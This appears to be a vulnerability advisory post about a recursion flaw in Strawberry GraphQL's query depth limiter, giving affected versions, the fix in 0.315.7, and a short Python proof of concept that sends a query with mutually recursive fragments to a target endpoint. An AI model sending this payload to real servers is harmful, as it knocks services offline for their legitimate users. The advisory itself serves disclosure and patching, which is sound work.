Listen to this Post
The QueryDepthLimiter extension in Strawberry GraphQL fails to implement proper cycle detection when processing GraphQL fragment spreads. The `determine_depth` function in `query_depth_limiter.py` recursively resolves `FragmentSpreadNode` objects without maintaining a set of already-visited fragments. By sending a crafted GraphQL query that contains circular references between fragments—for example, Fragment A spreading Fragment B, and Fragment B spreading Fragment A—an attacker can force the depth limiter into an infinite recursion.
When this occurs, the validator enters a stack of recursive calls that never terminates, exceeding the Python interpreter’s recursion depth limit. The interpreter raises a RecursionError, which crashes the query validation process. Because the validation phase occurs before any query execution, the server does not have a chance to intercept the malicious request. An attacker can repeatedly send such queries to exhaust server CPU cycles and lock up thread or worker pools, leading to a cheap and effective Application-level Denial of Service (DoS) condition. The vulnerability affects all versions of Strawberry GraphQL from 0.71.0 up to and including 0.315.6. The issue has been patched in version 0.315.7, where the QueryDepthLimiter now tracks visited fragments and aborts recursion when a cycle is detected.
DailyCVE Form:
Platform: Strawberry GraphQL
Version: 0.71.0-0.315.6
Vulnerability : Uncontrolled recursion
Severity: Medium (5.3)
date: 2026-06-04
Prediction: 2026-06-04
What Undercode Say:
Verify vulnerable version
pip show strawberry-graphql | grep Version
Version: 0.315.6
Exploit simulation using Python
python3 -c "
import httpx
payload = {'query': '''
fragment A on User { ...B }
fragment B on User { ...A }
query { user { ...A } }
'''}
try:
httpx.post('http://target/graphql', json=payload)
except Exception as e:
print(f'Server likely crashed: {e}')
"
Exploit:
The exploit is a single GraphQL query that defines two mutually recursive fragments and uses them in a root operation. This forces `determine_depth` to loop forever between the two fragments without any mechanism to detect the cycle.
Protection:
Upgrade to Strawberry GraphQL version 0.315.7 or later. The patch adds a visited set to the depth calculation, breaking recursion upon detecting a circular fragment reference.
Impact:
An unauthenticated attacker can repeatedly send the malicious query to crash the server validation process, causing prolonged downtime, CPU exhaustion, and denial of service for legitimate users. The attack requires minimal bandwidth and no special privileges, making it a high-impact, low-cost vector.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
